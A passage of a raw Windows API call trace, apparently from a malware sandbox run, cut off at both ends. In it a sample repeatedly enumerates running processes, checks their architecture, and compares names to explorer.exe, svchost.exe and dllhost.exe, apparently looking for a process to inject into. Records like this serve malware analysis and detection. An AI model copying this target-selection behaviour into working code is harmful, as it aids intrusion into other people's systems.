CloseHandle (hObject=0xd8) returned 1 [0213.013] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0213.013] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0213.013] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x958) returned 0xd8 [0213.013] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0213.013] CloseHandle (hObject=0xd8) returned 1 [0213.014] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0213.014] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 1 [0213.014] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5b8) returned 0xd8 [0213.014] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0213.015] CloseHandle (hObject=0xd8) returned 1 [0213.015] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 0 [0213.015] CloseHandle (hObject=0xd4) returned 1 [0213.015] Sleep (dwMilliseconds=0x3e8) [0214.057] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xd4 [0214.059] Process32First (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0214.060] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0214.060] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0214.060] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0214.060] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0214.061] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x104) returned 0x0 [0214.061] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0214.061] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0214.062] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0214.062] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x17c) returned 0x0 [0214.062] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0214.062] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x188) returned 0x0 [0214.063] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0214.063] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1b0) returned 0x0 [0214.063] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0214.063] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0 [0214.063] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0214.064] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d4) returned 0x0 [0214.064] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0214.064] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0214.064] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0214.065] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0214.065] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0214.065] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x298) returned 0x0 [0214.065] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0214.066] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0 [0214.066] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0214.066] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x334) returned 0x0 [0214.067] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0214.067] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x36c) returned 0x0 [0214.067] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0214.067] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a8) returned 0x0 [0214.068] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0214.068] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0214.068] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0214.068] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x124) returned 0x0 [0214.068] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0214.069] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x448) returned 0xd8 [0214.069] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0214.069] CloseHandle (hObject=0xd8) returned 1 [0214.069] lstrcmpiA (lpString1="dwm.exe", lpString2="explorer.exe") returned -1 [0214.069] lstrcmpiA (lpString1="dwm.exe", lpString2="svchost.exe") returned -1 [0214.069] lstrcmpiA (lpString1="dwm.exe", lpString2="dllhost.exe") returned 1 [0214.069] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0214.070] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x480) returned 0x0 [0214.070] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0214.070] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4ac) returned 0xd8 [0214.070] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0214.070] CloseHandle (hObject=0xd8) returned 1 [0214.070] lstrcmpiA (lpString1="taskhost.exe", lpString2="explorer.exe") returned 1 [0214.070] lstrcmpiA (lpString1="taskhost.exe", lpString2="svchost.exe") returned 1 [0214.070] lstrcmpiA (lpString1="taskhost.exe", lpString2="dllhost.exe") returned 1 [0214.070] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0214.071] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4d4) returned 0x0 [0214.071] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0214.071] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x0 [0214.071] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0214.072] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc4) returned 0xd8 [0214.072] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0214.072] CloseHandle (hObject=0xd8) returned 1 [0214.072] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0214.072] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x62c) returned 0xd8 [0214.072] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0214.073] CloseHandle (hObject=0xd8) returned 1 [0214.073] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0214.073] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5a4) returned 0xd8 [0214.073] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0214.073] CloseHandle (hObject=0xd8) returned 1 [0214.073] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0214.074] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x780) returned 0xd8 [0214.074] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0214.074] CloseHandle (hObject=0xd8) returned 1 [0214.074] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0214.074] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x240) returned 0xd8 [0214.074] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0214.074] CloseHandle (hObject=0xd8) returned 1 [0214.074] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0214.075] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c8) returned 0xd8 [0214.075] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0214.075] CloseHandle (hObject=0xd8) returned 1 [0214.075] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0214.075] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0xd8 [0214.075] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0214.075] CloseHandle (hObject=0xd8) returned 1 [0214.075] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0214.076] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x314) returned 0xd8 [0214.076] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0214.076] CloseHandle (hObject=0xd8) returned 1 [0214.076] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0214.077] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x320) returned 0xd8 [0214.077] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0214.077] CloseHandle (hObject=0xd8) returned 1 [0214.077] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0214.077] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7a4) returned 0xd8 [0214.077] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0214.077] CloseHandle (hObject=0xd8) returned 1 [0214.077] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0214.078] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x688) returned 0xd8 [0214.078] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0214.078] CloseHandle (hObject=0xd8) returned 1 [0214.078] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0214.078] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7f0) returned 0xd8 [0214.078] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0214.078] CloseHandle (hObject=0xd8) returned 1 [0214.078] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0214.079] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d4) returned 0xd8 [0214.079] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0214.079] CloseHandle (hObject=0xd8) returned 1 [0214.079] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0214.079] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x58c) returned 0xd8 [0214.079] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0214.079] CloseHandle (hObject=0xd8) returned 1 [0214.080] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0214.080] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x644) returned 0xd8 [0214.080] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0214.080] CloseHandle (hObject=0xd8) returned 1 [0214.080] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0214.081] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0xd8 [0214.081] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0214.081] CloseHandle (hObject=0xd8) returned 1 [0214.081] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0214.081] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5d8) returned 0xd8 [0214.081] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0214.081] CloseHandle (hObject=0xd8) returned 1 [0214.081] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0214.082] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d8) returned 0xd8 [0214.082] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0214.082] CloseHandle (hObject=0xd8) returned 1 [0214.082] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0214.082] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0xd8 [0214.083] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0214.083] CloseHandle (hObject=0xd8) returned 1 [0214.083] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0214.083] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7fc) returned 0xd8 [0214.083] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0214.083] CloseHandle (hObject=0xd8) returned 1 [0214.083] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0214.084] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x53c) returned 0xd8 [0214.084] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0214.084] CloseHandle (hObject=0xd8) returned 1 [0214.084] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0214.084] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x0 [0214.084] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0214.085] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x0 [0214.085] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0214.085] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa58) returned 0x0 [0214.085] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0214.086] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa70) returned 0x0 [0214.086] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0214.086] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb00) returned 0x0 [0214.086] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: 